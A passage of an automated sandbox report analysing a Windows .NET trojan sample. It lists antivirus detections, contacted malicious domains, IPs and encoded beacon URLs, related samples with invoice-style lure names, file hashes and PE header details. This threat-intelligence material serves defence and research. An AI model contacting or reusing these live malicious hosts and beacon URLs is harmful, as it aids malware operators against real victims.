0.2.9JzK89dRiaBYTuN.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1142734	Download File
1.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.9JzK89dRiaBYTuN.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1142734	Download File

Domains

Source	Detection	Scanner	Label	Link
panyu-qqbaby.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.lovertons.com/weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.konversationswithkoshie.net/weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
http://www.utformehagen.com/weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.advancedautorepairsonline.com/weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
www.panyu-qqbaby.com/weni/	100%	Avira URL Cloud	malware
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.profitsnavigator.com/weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.sdmdwang.com/weni/?Fzr4otMh=M4L27nnvKueB/wH9	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.regarta.com/weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.tapdaugusta.com/weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
panyu-qqbaby.com	107.160.109.196	true	true	2%, Virustotal, Browse	unknown
www.regarta.com	74.206.228.78	true	true		unknown
profitsnavigator.com	184.168.131.241	true	true		unknown
www.advancedautorepairsonline.com	104.168.135.142	true	true		unknown
www.utformehagen.com	45.39.95.186	true	true		unknown
tapdaugusta.com	34.102.136.180	true	false		unknown
www.sdmdwang.com	112.213.96.11	true	true		unknown
www.nicolettejohnsonphotography.com	185.53.177.11	true	false		unknown
www.kitkatmp3.com	156.224.60.3	true	false		unknown
konversationswithkoshie.net	34.102.136.180	true	false		unknown
www.lovertons.com	107.165.13.75	true	true		unknown
www.profitsnavigator.com	unknown	unknown	true		unknown
www.panyu-qqbaby.com	unknown	unknown	true		unknown
www.sunilpsingh.com	unknown	unknown	true		unknown
www.tapdaugusta.com	unknown	unknown	true		unknown
www.konversationswithkoshie.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.lovertons.com/weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj	true	Avira URL Cloud: safe	unknown
http://www.konversationswithkoshie.net/weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj	false	Avira URL Cloud: safe	unknown
http://www.utformehagen.com/weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj	true	Avira URL Cloud: safe	unknown
http://www.advancedautorepairsonline.com/weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj	true	Avira URL Cloud: safe	unknown
www.panyu-qqbaby.com/weni/	true	Avira URL Cloud: malware	low
http://www.profitsnavigator.com/weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj	true	Avira URL Cloud: safe	unknown
http://www.regarta.com/weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj	true	Avira URL Cloud: safe	unknown
http://www.tapdaugusta.com/weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.346086899.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sdmdwang.com/weni/?Fzr4otMh=M4L27nnvKueB/wH9	cmmon32.exe, 00000005.00000002.604875216.0000000002E3A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.39.95.186	www.utformehagen.com	United States	18779	EGIHOSTINGUS	true
74.206.228.78	www.regarta.com	United States	27257	WEBAIR-INTERNETUS	true
107.165.13.75	www.lovertons.com	United States	18779	EGIHOSTINGUS	true
34.102.136.180	tapdaugusta.com	United States	15169	GOOGLEUS	false
104.168.135.142	www.advancedautorepairsonline.com	United States	54290	HOSTWINDSUS	true
112.213.96.11	www.sdmdwang.com	Hong Kong	38197	SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong	true
184.168.131.241	profitsnavigator.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458757
Start date:	03.08.2021
Start time:	18:05:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9JzK89dRiaBYTuN.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@14/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 38.6% (good quality ratio 35.3%) Quality average: 71.4% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 83 Number of non-executed functions: 158
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 20.82.209.183, 80.67.82.235, 80.67.82.211, 23.211.4.86, 20.50.102.62, 40.112.88.60, 23.211.6.115, 20.82.210.154, 20.54.110.249 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:06:04	API Interceptor	1x Sleep call for process: 9JzK89dRiaBYTuN.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.39.95.186	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	www.utformehagen.com/weni/?RDK=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&p4z=4hlpdVHXhxhDq
104.168.135.142	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	www.advancedautorepairsonline.com/weni/?RDK=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&p4z=4hlpdVHXhxhDq
112.213.96.11	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse
184.168.131.241	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	www.ebizkendra.com/weni/?RDK=ayImJ3VvFLjut0oWVeNKefTTryKuXWCKpzq6bwFzJJBCMQQ0HG9KNr1WXEfPDJIbRr0W1LcuVQ==&p4z=4hlpdVHXhxhDq
	PaymentAdvice.exe	Get hash	malicious	Browse	www.googleai.support/mpus/?1brLA=qg1NhTBaCTMvJi4fHloli82B+0vRkhPmAz3GNDw0Xd0MwiH8ORH9SEpwjDzYe9s8Tw/L&V64DI=w6AhFR1puR6
	transferred $95,934.55 pdf.exe	Get hash	malicious	Browse	www.virtualweddingshowcase.com/eds5/?0lBT_bg=3PlxpJ1C6FnkwQY8BX70HHn3rTwZjmtAFnSVjH+xkBs8KohIuOBznAfdcUEXNFNBv+Rl&g4=6lQLZlCPnhoTAr5p
	rL3Wx4zKD4.exe	Get hash	malicious	Browse	www.conectaragora.com/n84e/?8pd=p6i+kRTx6iVgorjxXMyecgcPSEfEpCNZNLMvo7qFW93Imy9WrDA1CQT3eoMLkfW3eO1IeBYl3w==&yFQ=IBWhnJTXCL
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	www.negociosconjuanceri.com/usvr/?UTeX=0nvlV2GPCB&r6=8K4hT4tBVJwj19tbJMD9UbeESKMXdo+2Rprz9gG4h1f+JXqt0iE4eHHZje8wQ7QzkWP6
	QVwfduoULs.exe	Get hash	malicious	Browse	www.wthcoffee.com/dy8g/?aZ5DJ=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/6FNSkA/c1an&1b=6lr072Bhwzrd32Ep
	Scan#0068-46c3365.exe	Get hash	malicious	Browse	www.mattspears.com/q3t0/?-Zl=UMC4Jjoly1eODHm+FcBWOxnL8LWHLIDcyTo/W5aAvdQOfjiIlf5JJBz9yjFIPpyTGBGz&gJBT-f=IFNTv2l8I
	fzyVEFy0O2.exe	Get hash	malicious	Browse	www.wthcoffee.com/dy8g/?rRG=9rK4_&0bb4Dz=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/6FnNUw/Y3Sn
	To4jk3eXqu.exe	Get hash	malicious	Browse	www.wthcoffee.com/dy8g/?EXYhgb=3fS0&n2=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/6FNSkA/c1an
	both45431.exe	Get hash	malicious	Browse	www.bulverderoofing.com/lt0h/?06u=mVoRvCf0RwVQR4VHWMiRW1LS4StIw9SM2WmRDWz3JLlw42gjK1Y4EjbJzaldLz6mQIKE&bp=JBZ84XaXTrg0WBP
	EoH35.PDF.exe	Get hash	malicious	Browse	www.wxsocial.net/ushb/?-ZVhjp=6lE4rH0x7N5h7xUP&y48x=jD+SQ9M7TmcvIuj9QGxgtYDN3MBJME7yhCk8Mzzn4mBJEVl+fkrxjA9SXjr06Kl34ciA20OlkA==
	ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.doc	Get hash	malicious	Browse	www.theoyays.com/b8eu/?5jLxCj7=hbW4NgKHKYc8roSJNrRvZuaWJN7O0c4NyF9tmZLHtlvFyPu3BUuKHdzYXyRtt1WkRPPYsg==&S48H=-ZSXKLQ8r2B4yP
	7cQuHxOrXh.exe	Get hash	malicious	Browse	www.blackgirlvanlife.com/7bun/?lD=/gN6jVYNMVFDRayqbXkiyfbKJO5JP7TEqi3HPVa1wPvVanYFdjfGyUWlCJ91AM6j5BxR&8p=WFQ8pNmXe
	E51BZ4gBRo.exe	Get hash	malicious	Browse	www.envisionfordheights.com/dy8g/?b2J=vVE1EPQxUSj5keSwXQ0nVcRzGfWXkz9RjMRHA4uXWmpGUNFQRqk3IdgjXX7uo1+xb+nd&B8=Lxo81F_8VVShwdt0
	DXW7UkLRfc.exe	Get hash	malicious	Browse	www.bolaci.com/z7a/?3f=Ql-T7Nlh&5jwdC=WVS90hUWmpkTGT1OOPcluOtjKsvKyO1VBY1DavEpIybxr8fVLox8dXTGZHvaw1MCzLX2WpM2RQ==
	PurchaseOrder.exe	Get hash	malicious	Browse	www.audiomastering.services/mpus/?g0GlVZXP=NjtWYmbHGaua6z6M089rXz2zM8nRZxmRuBHyQVZpH0Kx1fxqhpuRhYAEnjtfSCfTCkrD&5j0=QVytZ0ePk6BT86V0
	klSsrzxwsbxeJQh.exe	Get hash	malicious	Browse	www.revolutionofwork.com/b82a/?6lDx=n1uL3g1okfkrhI1xUzmuaTwXUo3VEQhTTA78bPNirshuaCFektfiMGCAL5wnKLRq+0fh&ePG=-Zop3RnPxj
	ORDER -ASLF1SR00116-PDF.doc	Get hash	malicious	Browse	www.ukcarpetclean.com/b8eu/?ezr8A=NgJmDm99/9ztUW81NK7Uq1VUWUcB5YRNDd/5mPzE8GkbGxIIqB3hIG05Wg/Vh3H2+XZmQg==&9rXX=a0DtZFt
	6sT97BIRo5.exe	Get hash	malicious	Browse	www.mikecdmusic.com/nff/?tvFPa=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBESO11x4h1Owq&ON6x3=y8ZD
	Sales Order.exe	Get hash	malicious	Browse	www.tipthemusician.com/p6f2/?TDHDz=YJmG0SP9lzASKbAIt2axz2B/z1N0ELsFmtcEIiOY5N4XMFvQNJxRdGT4hDMtkT/4E6F7&v8Sh=KB_hx6

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.sdmdwang.com	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	112.213.96.11
www.kitkatmp3.com	d9UdQnXQ86ld31G.exe	Get hash	malicious	Browse	156.224.60.3
www.advancedautorepairsonline.com	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	104.168.135.142
www.utformehagen.com	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	45.39.95.186
www.nicolettejohnsonphotography.com	d9UdQnXQ86ld31G.exe	Get hash	malicious	Browse	185.53.177.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WEBAIR-INTERNETUS	Purchase Order.exe	Get hash	malicious	Browse	173.239.8.164
	dqVPlpmWYt.exe	Get hash	malicious	Browse	67.55.90.108
	WitNwYLlo9.exe	Get hash	malicious	Browse	213.247.47.190
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	173.239.5.6
	New order 201534.pdf.exe	Get hash	malicious	Browse	173.239.8.164
	payment_proof_Copy,pdf.exe	Get hash	malicious	Browse	213.247.47.190
	Shipment of your goods.exe	Get hash	malicious	Browse	173.239.5.6
	OUTSTANDING PAYMENT REMINDER.exe	Get hash	malicious	Browse	173.239.8.164
	Request for Quotation.exe	Get hash	malicious	Browse	173.239.5.6
	PROFORMA INVOICE-INV393456434.pdf.exe	Get hash	malicious	Browse	173.239.8.164
	SecuriteInfo.com.Trojan.Downloader.JVDL.21302.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.21302.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.7463.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.11267.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.21562.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.7463.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.11267.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.29269.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.21562.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.29269.xls	Get hash	malicious	Browse	213.247.46.53
EGIHOSTINGUS	xl2TVqLo6S	Get hash	malicious	Browse	104.253.157.88
	Form_TT_EUR57,890.exe	Get hash	malicious	Browse	23.27.129.115
	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	45.39.95.186
	PaymentAdvice.exe	Get hash	malicious	Browse	172.252.211.197
	NEW ORDER.xlsx	Get hash	malicious	Browse	166.88.19.180
	Transfer Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	104.252.53.222
	VfNmYKR1b7	Get hash	malicious	Browse	104.252.138.98
	NQrs7jd2jx	Get hash	malicious	Browse	104.252.175.26
	lJaJT4eG2S	Get hash	malicious	Browse	107.164.204.47
	MubZn4KtUK	Get hash	malicious	Browse	166.93.166.37
	sMpEuBRc2t.exe	Get hash	malicious	Browse	166.88.88.176
	oewvlm9yhw.exe	Get hash	malicious	Browse	104.252.121.237
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	23.230.235.108
	i01hLg63ev	Get hash	malicious	Browse	172.252.255.245
	auhToVTQTs.exe	Get hash	malicious	Browse	104.252.121.237
	xkNBltP31j.exe	Get hash	malicious	Browse	107.186.80.207
	m1Be7JKUv4.exe	Get hash	malicious	Browse	68.68.98.160
	yAm5YrRQhy.exe	Get hash	malicious	Browse	50.118.154.118
	mz4wx2t2u6	Get hash	malicious	Browse	172.120.223.190
	onE9luF6lN	Get hash	malicious	Browse	166.88.8.172

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9JzK89dRiaBYTuN.exe.log Download File
Process:	C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.779008586274415
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9JzK89dRiaBYTuN.exe
File size:	1263616
MD5:	d726ec6e056461dd7d3ce8890c3c9a4e
SHA1:	4f6b524ab5fa51d9c5465572de8075c857afb686
SHA256:	77d33d0e8b91781213a971ebc2e6abe4191bf2c28ff0ede19b07db092f590dff
SHA512:	fba04f9c88251951ce43353300194122cbdcf25ffb3f0d48dc6aec68fbdf5a09a945f3467a47dcef2c166679401910aae300451b91ef56913e5081488167e30d
SSDEEP:	24576:/0Sfx8DgCfx8DgR8zHf/7jcHuueymkthBrwDZBOmzLLH:r58DgC58Dg+Tzjuuun7HcZBOmPr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.a.................l............... ........@.. ....................................@................................

File Icon


Icon Hash:	b07968fcd4ec7090

Static PE Info

General
Entrypoint:	0x528bd2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61073A1C [Mon Aug 2 00:19:40 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
